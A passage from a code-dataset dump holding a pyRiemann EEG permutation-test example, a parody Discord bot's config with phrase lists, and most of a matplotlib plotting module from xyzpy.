concatenate_raws(raw_files)\n\n# Apply band-pass filter\nraw.filter(7., 35., method='iir')\n\nevents, _ = events_from_annotations(raw, event_id=dict(T1=2, T2=3))\n\npicks = pick_types(\n raw.info, meg=False, eeg=True, stim=False, eog=False, exclude='bads')\npicks = picks[::4]\n\n# Read epochs (train will be done only between 1 and 2s)\n# Testing will be done with a running classifier\nepochs = Epochs(\n raw,\n events,\n event_id,\n tmin,\n tmax,\n proj=True,\n picks=picks,\n baseline=None,\n preload=True,\n verbose=False)\nlabels = epochs.events[:, -1] - 2\n\n# get epochs\nepochs_data = epochs.get_data()\n\n# compute covariance matrices\ncovmats = Covariances().fit_transform(epochs_data)\n\nn_perms = 500\n###############################################################################\n# Pairwise distance based permutation test\n###############################################################################\n\nt_init = time()\np_test = PermutationDistance(n_perms, metric='riemann', mode='pairwise')\np, F = p_test.test(covmats, labels)\nduration = time() - t_init\n\nfig, axes = plt.subplots(1, 1, figsize=[6, 3], sharey=True)\np_test.plot(nbins=10, axes=axes)\nplt.title('Pairwise distance - %.2f sec.' % duration)\nprint('p-value: %.3f' % p)\nsns.despine()\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# t-test distance based permutation test\n###############################################################################\n\nt_init = time()\np_test = PermutationDistance(n_perms, metric='riemann', mode='ttest')\np, F = p_test.test(covmats, labels)\nduration = time() - t_init\n\nfig, axes = plt.subplots(1, 1, figsize=[6, 3], sharey=True)\np_test.plot(nbins=10, axes=axes)\nplt.title('t-test distance - %.2f sec.' % duration)\nprint('p-value: %.3f' % p)\nsns.despine()\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# F-test distance based permutation test\n###############################################################################\n\nt_init = time()\np_test = PermutationDistance(n_perms, metric='riemann', mode='ftest')\np, F = p_test.test(covmats, labels)\nduration = time() - t_init\n\nfig, axes = plt.subplots(1, 1, figsize=[6, 3], sharey=True)\np_test.plot(nbins=10, axes=axes)\nplt.title('F-test distance - %.2f sec.' % duration)\nprint('p-value: %.3f' % p)\nsns.despine()\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# Classification based permutation test\n###############################################################################\n\nclf = make_pipeline(CSP(4), LogisticRegression())\n\nt_init = time()\np_test = PermutationModel(n_perms, model=clf, cv=3, scoring='roc_auc')\np, F = p_test.test(covmats, labels)\nduration = time() - t_init\n\nfig, axes = plt.subplots(1, 1, figsize=[6, 3], sharey=True)\np_test.plot(nbins=10, axes=axes)\nplt.title('Classification - %.2f sec.' % duration)\nprint('p-value: %.3f' % p)\nsns.despine()\nplt.tight_layout()\nplt.show()\n","repo_name":"pyRiemann/pyRiemann","sub_path":"examples/stats/plot_oneWay_Manova.py","file_name":"plot_oneWay_Manova.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":535,"dataset":"github-code","pt":"19"} +{"seq_id":"33089803426","text":"# IDs for Hal to recognize.\nCRANEBOT_ID = 943551083467391006\nTOASTY_ID = 208946659361554432\n\nSECRET_GUILD = 567541770943070236\nHOME_GUILD = 944731867570143264\n\n# Help message\nHELP_MESSAGE = \"It seems you have asked about Crane's parody-auto-responder Discord bot. \" \\\n \"This is an application designed to simulate the ice-cold and magnetic conversational styling of \" \\\n \"Lil Hal Jr. The algorithms are guaranteed to be in ongoing development, and wonky from time to time. \" \\\n \"Use `^inquire` with any query, and Lil Hal Jr. will pull a statistical analysis straight out of his \" \\\n \"ass, just for you.\"\n\n# Each phrase is configured in lowercase, and mapped to its rudeness level, 1-5. Or 6...\n# Working on regex support...\nquiet_phrases = {\n \"quiet down\": 1,\n r\"\\bs+h+\\b\": 1,\n r\"\\bs*h+u+s+h+\": 1,\n \"be quiet\": 2,\n \"zip it\": 3,\n \"stop talking\": 3,\n \"put a sock in it\": 4,\n \"go away\": 4,\n \"shut up\": 5,\n \"fuck off\": 6,\n \"drop dead\": 6\n}\n\nreturn_phrases = [\n \"come back\",\n \"i didnt mean it\",\n \"i didnt mean that\",\n \"you can talk\"\n]\n\nQUIET_EMOJI = \"🤫\"\n","repo_name":"cryptiddddd/lilhaljr","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11973932894","text":"\"\"\"\nFunctions for plotting datasets nicely.\n\"\"\"\n# TODO: custom xtick labels #\n# TODO: annotations, arbitrary text #\n# TODO: docs #\n\nimport functools\nimport itertools\nimport collections\n\nimport numpy as np\n\nfrom ..manage import auto_xyz_ds\nfrom .core import (\n Plotter,\n AbstractLinePlot,\n AbstractScatter,\n AbstractHistogram,\n AbstractHeatMap,\n PLOTTER_DEFAULTS,\n calc_row_col_datasets,\n intercept_call_arg,\n prettify,\n)\nfrom .color import xyz_colormaps, cimple\n\n\n# ----------------- Main lineplot interface for matplotlib ------------------ #\n\nclass PlotterMatplotlib(Plotter):\n \"\"\"\n \"\"\"\n\n def __init__(self, ds, x, y, z=None, y_err=None, x_err=None, **kwargs):\n super().__init__(ds, x, y, z=z, y_err=y_err, x_err=x_err,\n **kwargs, backend='MATPLOTLIB')\n\n def prepare_axes(self):\n \"\"\"\n \"\"\"\n import matplotlib as mpl\n if self.math_serif:\n mpl.rcParams['mathtext.fontset'] = 'cm'\n mpl.rcParams['mathtext.rm'] = 'serif'\n mpl.rcParams['font.family'] = self.font\n mpl.rcParams['font.weight'] = self.font_weight\n import matplotlib.pyplot as plt\n\n if self.axes_rloc is not None:\n if self.axes_loc is not None:\n raise ValueError(\"Cannot specify absolute and relative \"\n \"location of axes at the same time.\")\n if self.add_to_fig is None:\n raise ValueError(\"Can only specify relative axes position \"\n \"when adding to a figure, i.e. when \"\n \"add_to_fig != None\")\n\n if self.axes_rloc is not None:\n self._axes_loc = self._cax_rel2abs_rect(\n self.axes_rloc, self.add_to_fig.get_axes()[-1])\n else:\n self._axes_loc = self.axes_loc\n\n # Add a new set of axes to an existing plot\n if self.add_to_fig is not None and self.subplot is None:\n self._fig = self.add_to_fig\n self._axes = self._fig.add_axes((0.4, 0.6, 0.30, 0.25)\n if self._axes_loc is None else\n self._axes_loc)\n\n # Add lines to an existing set of axes\n elif self.add_to_axes is not None:\n self._fig = self.add_to_axes\n self._axes = self._fig.get_axes()[-1]\n\n # Add lines to existing axes but only sharing the x-axis\n elif self.add_to_xaxes is not None:\n self._fig = self.add_to_xaxes\n self._axes = self._fig.get_axes()[-1].twinx()\n\n elif self.subplot is not None:\n # Add new axes as subplot to existing subplot\n if self.add_to_fig is not None:\n self._fig = self.add_to_fig\n\n # New figure but add as subplot\n else:\n self._fig = plt.figure(self.fignum, figsize=self.figsize,\n dpi=100)\n self._axes = self._fig.add_subplot(self.subplot)\n\n # Make new figure and axes\n else:\n self._fig = plt.figure(self.fignum, figsize=self.figsize, dpi=100)\n self._axes = self._fig.add_axes((0.15, 0.15, 0.8, 0.75)\n if self._axes_loc is None else\n self._axes_loc)\n self._axes.set_title(\"\" if self.title is None else self.title,\n fontsize=self.fontsize_title, pad=self.title_pad)\n\n def set_axes_labels(self):\n if self._xtitle:\n self._axes.set_xlabel(self._xtitle, fontsize=self.fontsize_xtitle)\n self._axes.xaxis.labelpad = self.xtitle_pad\n if self._ytitle:\n self._axes.set_ylabel(self._ytitle, fontsize=self.fontsize_ytitle)\n self._axes.yaxis.labelpad = self.ytitle_pad\n if self.ytitle_right:\n self._axes.yaxis.set_label_position(\"right\")\n\n def set_axes_scale(self):\n \"\"\"\n \"\"\"\n self._axes.set_xscale(\"log\" if self.xlog else \"linear\")\n self._axes.set_yscale(\"log\" if self.ylog else \"linear\")\n\n def set_axes_range(self):\n \"\"\"\n \"\"\"\n if self._xlims:\n self._axes.set_xlim(self._xlims)\n if self._ylims:\n self._axes.set_ylim(self._ylims)\n\n def set_spans(self):\n \"\"\"\n \"\"\"\n if self.vlines is not None:\n for x in self.vlines:\n self._axes.axvline(x, lw=self.span_width,\n color=self.span_color,\n linestyle=self.span_style)\n if self.hlines is not None:\n for y in self.hlines:\n self._axes.axhline(y, lw=self.span_width,\n color=self.span_color,\n linestyle=self.span_style)\n\n def set_gridlines(self):\n \"\"\"\n \"\"\"\n for axis in ('top', 'bottom', 'left', 'right'):\n self._axes.spines[axis].set_linewidth(1.0)\n\n if self.gridlines:\n # matplotlib has coarser gridine style than bokeh\n self._gridline_style = [x / 2 for x in self.gridline_style]\n self._axes.set_axisbelow(True) # ensures gridlines below all\n self._axes.grid(True, color=\"0.9\", which='major',\n linestyle=(0, self._gridline_style))\n self._axes.grid(True, color=\"0.95\", which='minor',\n linestyle=(0, self._gridline_style))\n\n def set_tick_marks(self):\n \"\"\"\n \"\"\"\n import matplotlib as mpl\n\n if self.xticks is not None:\n self._axes.set_xticks(self.xticks, minor=False)\n self._axes.get_xaxis().set_major_formatter(\n mpl.ticker.ScalarFormatter())\n if self.yticks is not None:\n self._axes.set_yticks(self.yticks, minor=False)\n self._axes.get_yaxis().set_major_formatter(\n mpl.ticker.ScalarFormatter())\n\n if self.xtick_labels is not None:\n self._axes.set_xticklabels(self.xtick_labels)\n\n if self.xticklabels_hide:\n (self._axes.get_xaxis()\n .set_major_formatter(mpl.ticker.NullFormatter()))\n if self.yticklabels_hide:\n (self._axes.get_yaxis()\n .set_major_formatter(mpl.ticker.NullFormatter()))\n\n self._axes.tick_params(labelsize=self.fontsize_ticks, direction='out',\n bottom='bottom' in self.ticks_where,\n top='top' in self.ticks_where,\n left='left' in self.ticks_where,\n right='right' in self.ticks_where)\n\n if self.yticklabels_right or (self.yticklabels_right is None and\n self.ytitle_right is True):\n self._axes.yaxis.tick_right()\n\n def _cax_rel2abs_rect(self, rel_rect, cax=None):\n \"\"\"Turn a relative axes specification into a absolute one.\n \"\"\"\n if cax is None:\n cax = self._axes\n bbox = cax.get_position()\n l, b, w, h = bbox.x0, bbox.y0, bbox.width, bbox.height\n cl = l + w * rel_rect[0]\n cb = b + h * rel_rect[1]\n try:\n cw = w * rel_rect[2]\n ch = h * rel_rect[3]\n except IndexError:\n return cl, cb\n return cl, cb, cw, ch\n\n def plot_legend(self, grid=False, labels_handles=None):\n \"\"\"Add a legend\n \"\"\"\n if self._use_legend:\n\n if labels_handles:\n labels, handles = zip(*labels_handles.items())\n else:\n handles, labels = self._legend_handles, self._legend_labels\n\n if self.legend_reverse:\n handles, labels = handles[::-1], labels[::-1]\n\n # Limit minimum size of markers that appear in legend\n should_auto_scale_legend_markers = (\n (self.legend_marker_scale is None) and # not already set\n hasattr(self, '_marker_size') and # is a valid parameter\n self._marker_size < 3 # and is small\n )\n if should_auto_scale_legend_markers:\n self.legend_marker_scale = 3 / self._marker_size\n\n opts = {\n 'title': (self.z_coo if self.ztitle is None else self.ztitle),\n 'loc': self.legend_loc,\n 'fontsize': self.fontsize_zlabels,\n 'frameon': self.legend_frame,\n 'framealpha': self.legend_frame_alpha,\n 'numpoints': 1,\n 'scatterpoints': 1,\n 'handlelength': self.legend_handlelength,\n 'markerscale': self.legend_marker_scale,\n 'labelspacing': self.legend_label_spacing,\n 'columnspacing': self.legend_column_spacing,\n 'bbox_to_anchor': self.legend_bbox,\n 'ncol': self.legend_ncol\n }\n\n if grid:\n bb = opts['bbox_to_anchor']\n if bb is None:\n opts['bbox_to_anchor'] = (1, 0.5, 0, 0)\n opts['loc'] = 'center left'\n else:\n loc = opts['loc']\n # will get warning for 'best'\n opts['loc'] = 'center' if loc in ('best', 0) else loc\n lgnd = self._fig.legend(handles, labels, **opts)\n else:\n lgnd = self._axes.legend(handles, labels, **opts)\n\n lgnd.get_title().set_fontsize(self.fontsize_ztitle)\n\n if self.legend_marker_alpha is not None:\n for legendline in lgnd.legendHandles:\n legendline.set_alpha(1.0)\n\n def set_mappable(self):\n \"\"\"Mappale object for colorbars.\n \"\"\"\n from matplotlib.cm import ScalarMappable\n self.mappable = ScalarMappable(cmap=self.cmap, norm=self._color_norm)\n self.mappable.set_array([])\n\n def plot_colorbar(self, grid=False):\n \"\"\"Add a colorbar to the data.\n \"\"\"\n\n if self._use_colorbar:\n # Whether the colorbar should clip at either end\n extendmin = (self.vmin is not None) and (self.vmin > self._zmin)\n extendmax = (self.vmax is not None) and (self.vmax < self._zmax)\n extend = ('both' if extendmin and extendmax else\n 'min' if extendmin else\n 'max' if extendmax else\n 'neither')\n\n opts = {'extend': extend, 'ticks': self.zticks}\n\n if self.colorbar_relative_position:\n opts['cax'] = self._fig.add_axes(\n self._cax_rel2abs_rect(self.colorbar_relative_position))\n\n if grid:\n opts['ax'] = self._fig.axes\n opts['anchor'] = (0.5, 0.5)\n\n self._cbar = self._fig.colorbar(\n self.mappable, **opts, **self.colorbar_opts)\n\n self._cbar.ax.tick_params(labelsize=self.fontsize_zlabels)\n\n self._cbar.ax.set_title(\n self._ctitle, fontsize=self.fontsize_ztitle,\n color=self.colorbar_color if self.colorbar_color else None)\n\n if self.colorbar_color:\n self._cbar.ax.yaxis.set_tick_params(\n color=self.colorbar_color, labelcolor=self.colorbar_color)\n self._cbar.outline.set_edgecolor(self.colorbar_color)\n\n def set_panel_label(self):\n if self.panel_label is not None:\n self._axes.text(*self.panel_label_loc, self.panel_label,\n transform=self._axes.transAxes,\n fontsize=self.fontsize_panel_label,\n color=self.panel_label_color,\n ha='left', va='top')\n\n def show(self):\n import matplotlib.pyplot as plt\n if self.return_fig:\n plt.close(self._fig)\n return self._fig\n\n def prepare_plot(self):\n \"\"\"Do all the things that every plot has.\n \"\"\"\n self.prepare_axes()\n self.set_axes_labels()\n self.set_axes_scale()\n self.set_axes_range()\n self.set_spans()\n self.set_gridlines()\n self.set_tick_marks()\n\n# --------------------------------------------------------------------------- #\n\n\ndef mpl_multi_plot(fn):\n \"\"\"Decorate a plotting function to plot a grid of values.\n \"\"\"\n\n @functools.wraps(fn)\n def multi_plotter(ds, *args, row=None, col=None, hspace=None, wspace=None,\n tight_layout=True, coltitle=None, rowtitle=None,\n **kwargs):\n\n if (row is None) and (col is None):\n return fn(ds, *args, **kwargs)\n\n import matplotlib.pyplot as plt\n from matplotlib.gridspec import GridSpec\n\n # Set some global parameters\n p = fn(ds, *args, **kwargs, call=False)\n p.prepare_data_multi_grid()\n\n kwargs['vmin'] = kwargs.pop('vmin', p.vmin)\n kwargs['vmax'] = kwargs.pop('vmax', p.vmax)\n\n coltitle = col if coltitle is None else coltitle\n rowtitle = row if rowtitle is None else rowtitle\n\n # split the dataset into its respective rows and columns\n ds_r_c, nrows, ncols = calc_row_col_datasets(ds, row=row, col=col)\n\n figsize = kwargs.pop('figsize', (3 * ncols, 3 * nrows))\n return_fig = kwargs.pop('return_fig', PLOTTER_DEFAULTS['return_fig'])\n\n # generate a figure for all the plots to use\n p._fig = plt.figure(figsize=figsize, dpi=100,\n constrained_layout=tight_layout)\n p._fig.set_constrained_layout_pads(hspace=hspace, wspace=wspace)\n # and a gridspec to position them\n gs = GridSpec(nrows=nrows, ncols=ncols, figure=p._fig,\n hspace=hspace, wspace=wspace)\n\n # want to collect all entries for legend\n labels_handles = {}\n\n # range through rows and do subplots\n for i, ds_r in enumerate(ds_r_c):\n skws = {'legend': False, 'colorbar': False}\n\n # if not last row\n if i != nrows - 1:\n skws['xticklabels_hide'] = True\n skws['xtitle'] = ''\n\n # range through columns\n for j, sub_ds in enumerate(ds_r):\n\n if hspace == 0 and wspace == 0:\n ticks_where = []\n if j == 0:\n ticks_where.append('left')\n if i == 0:\n ticks_where.append('top')\n if j == ncols - 1:\n ticks_where.append('right')\n if i == nrows - 1:\n ticks_where.append('bottom')\n skws['ticks_where'] = ticks_where\n\n # if not first column\n if j != 0:\n skws['yticklabels_hide'] = True\n skws['ytitle'] = ''\n\n # label each column\n if (i == 0) and (col is not None):\n col_val = prettify(ds[col].values[j])\n skws['title'] = \"{} = {}\".format(coltitle, col_val)\n fx = 'fontsize_xtitle'\n skws['fontsize_title'] = kwargs.get(\n fx, PLOTTER_DEFAULTS[fx])\n\n # label each row\n if (j == ncols - 1) and (row is not None):\n # XXX: if number of cols==1 this hide yaxis - want both\n row_val = prettify(ds[row].values[i])\n skws['ytitle_right'] = True\n skws['ytitle'] = \"{} = {}\".format(rowtitle, row_val)\n\n sP = fn(sub_ds, *args, add_to_fig=p._fig, call='both',\n subplot=gs[i, j], **{**kwargs, **skws})\n\n try:\n labels_handles.update(dict(zip(sP._legend_labels,\n sP._legend_handles)))\n except AttributeError:\n pass\n\n # make sure all have the same plot ranges\n xmins, xmaxs = zip(*(gax.get_xlim() for gax in p._fig.axes))\n ymins, ymaxs = zip(*(gax.get_ylim() for gax in p._fig.axes))\n xmin, xmax = min(xmins), max(xmaxs)\n ymin, ymax = min(ymins), max(ymaxs)\n for gax in p._fig.axes:\n gax.set_xlim(xmin, xmax)\n gax.set_ylim(ymin, ymax)\n\n # add global legend or colorbar\n p.plot_legend(grid=True, labels_handles=labels_handles)\n p.plot_colorbar(grid=True)\n\n if return_fig:\n plt.close(p._fig)\n return p._fig\n\n return multi_plotter\n\n\n# --------------------------------------------------------------------------- #\n\nclass LinePlot(PlotterMatplotlib, AbstractLinePlot):\n \"\"\"\n \"\"\"\n\n def __init__(self, ds, x, y, z=None, *, y_err=None, x_err=None, **kwargs):\n super().__init__(ds, x, y, z=z, y_err=y_err, x_err=x_err, **kwargs)\n\n def plot_lines(self):\n \"\"\"\n \"\"\"\n for data in self._gen_xy():\n col = next(self._cols)\n\n line_opts = {\n 'c': col,\n 'lw': next(self._lws),\n 'marker': next(self._mrkrs),\n 'markersize': self._marker_size,\n 'markeredgecolor': col[:3] + (self.marker_alpha * col[3],),\n 'markerfacecolor': col[:3] + (self.marker_alpha * col[3] / 2,),\n 'label': next(self._zlbls),\n 'zorder': next(self._zordrs),\n 'linestyle': next(self._lines),\n 'rasterized': self.rasterize,\n }\n\n if ('ye' in data) or ('xe' in data):\n self._axes.errorbar(data['x'], data['y'],\n yerr=data.get('ye', None),\n xerr=data.get('xe', None),\n ecolor=col,\n capsize=self.errorbar_capsize,\n capthick=self.errorbar_capthick,\n elinewidth=self.errorbar_linewidth,\n **line_opts)\n else:\n # add line to axes, with options cycled through\n self._axes.plot(data['x'], data['y'], **line_opts)\n\n self._legend_handles, self._legend_labels = \\\n self._axes.get_legend_handles_labels()\n\n def __call__(self):\n self.prepare_data_single()\n # matplotlib preparation\n self.prepare_plot()\n self.plot_lines()\n self.plot_legend()\n self.plot_colorbar()\n self.set_panel_label()\n return self.show()\n\n\n@mpl_multi_plot\n@intercept_call_arg\ndef lineplot(ds, x, y, z=None, y_err=None, x_err=None, **plot_opts):\n \"\"\"From ``ds`` plot lines of ``y`` as a function of ``x``, optionally for\n varying ``z``.\n\n Parameters\n ----------\n ds : xarray.Dataset\n Dataset to plot from.\n x : str\n Dimension to plot along the x-axis.\n y : str or tuple[str]\n Variable(s) to plot along the y-axis. If tuple, plot each of the\n variables - instead of ``z``.\n z : str, optional\n Dimension to plot into the page.\n y_err : str, optional\n Variable to plot as y-error.\n x_err : str, optional\n Variable to plot as x-error.\n row : str, optional\n Dimension to vary over as a function of rows.\n col : str, optional\n Dimension to vary over as a function of columns.\n plot_opts\n See ``xyzpy.plot.core.PLOTTER_DEFAULTS``.\n \"\"\"\n return LinePlot(ds, x, y, z, y_err=y_err, x_err=x_err, **plot_opts)\n\n\nclass AutoLinePlot(LinePlot):\n def __init__(self, x, y_z, **lineplot_opts):\n ds = auto_xyz_ds(x, y_z)\n super().__init__(ds, 'x', 'y', z='z', **lineplot_opts)\n\n\ndef auto_lineplot(x, y_z, **lineplot_opts):\n \"\"\"Auto version of :func:`~xyzpy.lineplot` that accepts array arguments\n by converting them to a ``Dataset`` first.\n \"\"\"\n return AutoLinePlot(x, y_z, **lineplot_opts)()\n\n\n# --------------------------------------------------------------------------- #\n\n_SCATTER_ALT_DEFAULTS = (\n ('legend_handlelength', 0),\n)\n\n\nclass Scatter(PlotterMatplotlib, AbstractScatter):\n\n def __init__(self, ds, x, y, z=None, **kwargs):\n # set some scatter specific options\n for k, default in _SCATTER_ALT_DEFAULTS:\n if k not in kwargs:\n kwargs[k] = default\n super().__init__(ds, x, y, z, **kwargs)\n\n def plot_scatter(self):\n \"\"\"\n \"\"\"\n self._legend_handles = []\n self._legend_labels = []\n\n for data in self._gen_xy():\n if 'c' in data:\n col = data['c']\n else:\n col = [next(self._cols)]\n\n scatter_opts = {\n 'c': col,\n 'marker': next(self._mrkrs),\n 's': self._marker_size,\n 'alpha': self.marker_alpha,\n 'label': next(self._zlbls),\n 'zorder': next(self._zordrs),\n 'rasterized': self.rasterize,\n }\n\n if 'c' in data:\n scatter_opts['cmap'] = self.cmap\n\n self._legend_handles.append(\n self._axes.scatter(data['x'], data['y'], **scatter_opts))\n self._legend_labels.append(\n scatter_opts['label'])\n\n def __call__(self):\n self.prepare_data_single()\n # matplotlib preparation\n self.prepare_plot()\n self.plot_scatter()\n self.plot_legend()\n self.plot_colorbar()\n self.set_panel_label()\n return self.show()\n\n\n@mpl_multi_plot\n@intercept_call_arg\ndef scatter(ds, x, y, z=None, y_err=None, x_err=None, **plot_opts):\n \"\"\"From ``ds`` plot a scatter of ``y`` against ``x``, optionally for\n varying ``z``.\n\n Parameters\n ----------\n ds : xarray.Dataset\n Dataset to plot from.\n x : str\n Quantity to plot along the x-axis.\n y : str or tuple[str]\n Quantity(s) to plot along the y-axis. If tuple, plot each of the\n variables - instead of ``z``.\n z : str, optional\n Dimension to plot into the page.\n y_err : str, optional\n Variable to plot as y-error.\n x_err : str, optional\n Variable to plot as x-error.\n row : str, optional\n Dimension to vary over as a function of rows.\n col : str, optional\n Dimension to vary over as a function of columns.\n plot_opts\n See ``xyzpy.plot.core.PLOTTER_DEFAULTS``.\n \"\"\"\n return Scatter(ds, x, y, z, y_err=y_err, x_err=x_err, **plot_opts)\n\n\nclass AutoScatter(Scatter):\n\n def __init__(self, x, y_z, **scatter_opts):\n ds = auto_xyz_ds(x, y_z)\n super().__init__(ds, 'x', 'y', z='z', **scatter_opts)\n\n\ndef auto_scatter(x, y_z, **scatter_opts):\n \"\"\"Auto version of :func:`~xyzpy.scatter` that accepts array arguments\n by converting them to a ``Dataset`` first.\n \"\"\"\n return AutoScatter(x, y_z, **scatter_opts)()\n\n\n# --------------------------------------------------------------------------- #\n\n_HISTOGRAM_SPECIFIC_OPTIONS = {\n 'stacked': False,\n}\n\n_HISTOGRAM_ALT_DEFAULTS = {\n 'xtitle': 'x',\n 'ytitle': 'f(x)',\n}\n\n\nclass Histogram(PlotterMatplotlib, AbstractHistogram):\n\n def __init__(self, ds, x, z=None, **kwargs):\n\n # Set the alternative defaults\n for opt, default in _HISTOGRAM_ALT_DEFAULTS.items():\n if opt not in kwargs:\n kwargs[opt] = default\n\n # Set histogram specfic options\n for opt, default in _HISTOGRAM_SPECIFIC_OPTIONS.items():\n setattr(self, opt, kwargs.pop(opt, default))\n\n super().__init__(ds, x, None, z=z, **kwargs)\n\n def plot_histogram(self):\n from matplotlib.patches import Rectangle, Polygon\n\n def gen_ind_plots():\n for data in self._gen_xy():\n col = next(self._cols)\n\n edgecolor = col[:3] + (self.marker_alpha * col[3],)\n facecolor = col[:3] + (self.marker_alpha * col[3] / 4,)\n linewidth = next(self._lws)\n zorder = next(self._zordrs)\n label = next(self._zlbls)\n\n handle = Rectangle((0, 0), 1, 1, color=facecolor, ec=edgecolor)\n\n yield (data['x'], edgecolor, facecolor, linewidth, zorder,\n label, handle)\n\n xs, ecs, fcs, lws, zds, lbs, hnds = zip(*gen_ind_plots())\n\n histogram_opts = {\n 'label': lbs,\n 'bins': self.bins,\n 'density': True,\n 'histtype': 'stepfilled',\n 'fill': True,\n 'stacked': self.stacked,\n 'rasterized': self.rasterize,\n }\n\n _, _, patches = self._axes.hist(xs, **histogram_opts)\n\n # Need to set varying colors, linewidths etc seperately\n for patch, ec, fc, lw, zd in zip(patches, ecs, fcs, lws, zds):\n\n # patch is not iterable if only one set of data created\n if isinstance(patch, Polygon):\n patch = (patch,)\n\n for sub_patch in patch:\n sub_patch.set_edgecolor(ec)\n sub_patch.set_facecolor(fc)\n sub_patch.set_linewidth(lw)\n sub_patch.set_zorder(zd)\n\n # store handles for legend\n self._legend_handles, self._legend_labels = hnds, lbs\n\n def __call__(self):\n # Core preparation\n self.prepare_data_single()\n # matplotlib preparation\n self.prepare_plot()\n self.plot_histogram()\n self.plot_legend()\n self.plot_colorbar()\n self.set_panel_label()\n return self.show()\n\n\n@mpl_multi_plot\n@intercept_call_arg\ndef histogram(ds, x, z=None, **plot_opts):\n \"\"\"Dataset histogram.\n\n Parameters\n ----------\n ds : xarray.Dataset\n The dataset to plot.\n x : str, sequence of str\n The variable(s) to plot the probability density of. If sequence, plot a\n histogram of each instead of using a ``z`` coordinate.\n z : str, optional\n If given, range over this coordinate a plot a histogram for each.\n row : str, optional\n Dimension to vary over as a function of rows.\n col : str, optional\n Dimension to vary over as a function of columns.\n plot_opts\n See ``xyzpy.plot.core.PLOTTER_DEFAULTS``.\n \"\"\"\n return Histogram(ds, x, z=z, **plot_opts)\n\n\nclass AutoHistogram(Histogram):\n\n def __init__(self, x, **histogram_opts):\n ds = auto_xyz_ds(x)\n super().__init__(ds, 'x', **histogram_opts)\n\n\ndef auto_histogram(x, **histogram_opts):\n \"\"\"Auto version of :func:`~xyzpy.histogram` that accepts array arguments\n by converting them to a ``Dataset`` first.\n \"\"\"\n return AutoHistogram(x, **histogram_opts)()\n\n\n# --------------------------------------------------------------------------- #\n\n_HEATMAP_ALT_DEFAULTS = (\n ('legend', False),\n ('colorbar', True),\n ('colormap', 'inferno'),\n ('method', 'pcolormesh'),\n ('gridlines', False),\n ('rasterize', True),\n)\n\n\nclass HeatMap(PlotterMatplotlib, AbstractHeatMap):\n\n def __init__(self, ds, x, y, z, **kwargs):\n # set some heatmap specific options\n for k, default in _HEATMAP_ALT_DEFAULTS:\n if k not in kwargs:\n kwargs[k] = default\n super().__init__(ds, x, y, z, **kwargs)\n\n def plot_heatmap(self):\n \"\"\"Plot the data as a heatmap.\n \"\"\"\n self.calc_color_norm()\n\n # add extra coords since they *bound* the quads placed -> want ticks\n # at center of quads\n X = self._heatmap_x\n av_x_bin = np.mean(np.abs(X[:-1] - X[1:]))\n X = np.append(X - av_x_bin / 2, X[-1] + av_x_bin / 2)\n\n Y = self._heatmap_y\n av_Y_bin = np.mean(np.abs(Y[:-1] - Y[1:]))\n Y = np.append(Y - av_Y_bin / 2, Y[-1] + av_Y_bin / 2)\n\n self._heatmap = getattr(self._axes, self.method)(\n X, Y, self._heatmap_var,\n norm=self._color_norm,\n cmap=xyz_colormaps(self.colormap),\n rasterized=self.rasterize)\n\n def __call__(self):\n # Core preparation\n self.prepare_data_single()\n # matplotlib preparation\n self.prepare_plot()\n self.plot_heatmap()\n self.plot_colorbar()\n self.set_panel_label()\n return self.show()\n\n\n@mpl_multi_plot\n@intercept_call_arg\ndef heatmap(ds, x, y, z, **kwargs):\n \"\"\"From ``ds`` plot variable ``z`` as a function of ``x`` and ``y`` using\n a 2D heatmap.\n\n Parameters\n ----------\n ds : xarray.Dataset\n Dataset to plot from.\n x : str\n Dimension to plot along the x-axis.\n y : str\n Dimension to plot along the y-axis.\n z : str, optional\n Variable to plot as colormap.\n row : str, optional\n Dimension to vary over as a function of rows.\n col : str, optional\n Dimension to vary over as a function of columns.\n plot_opts\n See ``xyzpy.plot.core.PLOTTER_DEFAULTS``.\n \"\"\"\n return HeatMap(ds, x, y, z, **kwargs)\n\n\nclass AutoHeatMap(HeatMap):\n\n def __init__(self, x, **heatmap_opts):\n ds = auto_xyz_ds(x)\n super().__init__(ds, 'y', 'z', 'x', **heatmap_opts)\n\n\ndef auto_heatmap(x, **heatmap_opts):\n \"\"\"Auto version of :func:`~xyzpy.heatmap` that accepts array arguments\n by converting them to a ``Dataset`` first.\n \"\"\"\n return AutoHeatMap(x, **heatmap_opts)()\n\n\n# --------------- Miscellenous matplotlib plotting functions ---------------- #\n\ndef setup_fig_ax(\n nrows=1,\n ncols=1,\n facecolor=None,\n rasterize=False,\n rasterize_dpi=300,\n figsize=(5, 5),\n ax=None,\n **kwargs,\n):\n import matplotlib.pyplot as plt\n\n if ax is None:\n fig, ax = plt.subplots(nrows, ncols, figsize=figsize, **kwargs)\n\n fig.patch.set_alpha(0.0)\n else:\n fig = None\n\n if not isinstance(ax, np.ndarray):\n # squeezed to single axis\n ax.set_aspect('equal')\n ax.axis('off')\n\n if facecolor is not None:\n fig.patch.set_facecolor(facecolor)\n\n if rasterize:\n ax.set_rasterization_zorder(0)\n if fig is not None:\n fig.set_dpi(rasterize_dpi)\n\n return fig, ax\n\n\ndef show_and_close(fn):\n\n @functools.wraps(fn)\n def wrapped(*args, show_and_close=True, **kwargs):\n import warnings\n import matplotlib.pyplot as plt\n\n # remove annoying regular warning about all-nan slices\n with warnings.catch_warnings():\n warnings.filterwarnings(\n action='ignore',\n message='All-NaN slice',\n )\n fig, ax = fn(*args, **kwargs)\n\n if fig is not None:\n if show_and_close:\n plt.show()\n plt.close(fig)\n\n return fig, ax\n\n return wrapped\n\n\ndef choose_squarest_grid(x):\n p = x ** 0.5\n if p.is_integer():\n m = n = int(p)\n else:\n m = int(round(p))\n p = int(p)\n n = p if m * p >= x else p + 1\n return m, n\n\n\ndef _compute_hue(z):\n # the constant rotation is to have blue and orange as + and -\n # negation puts +i as green -i as pink\n return ((-np.angle(z) + 9 * np.pi / 8) / (2 * np.pi)) % 1\n\n\ndef to_colors(\n zs,\n magscale='linear',\n max_mag=None,\n alpha_map=True,\n alpha_pow=1/2,\n):\n import matplotlib as mpl\n arraymag = np.abs(zs)\n\n if magscale == 'linear':\n mapped_mag = arraymag\n elif magscale == 'log':\n # XXX: need some 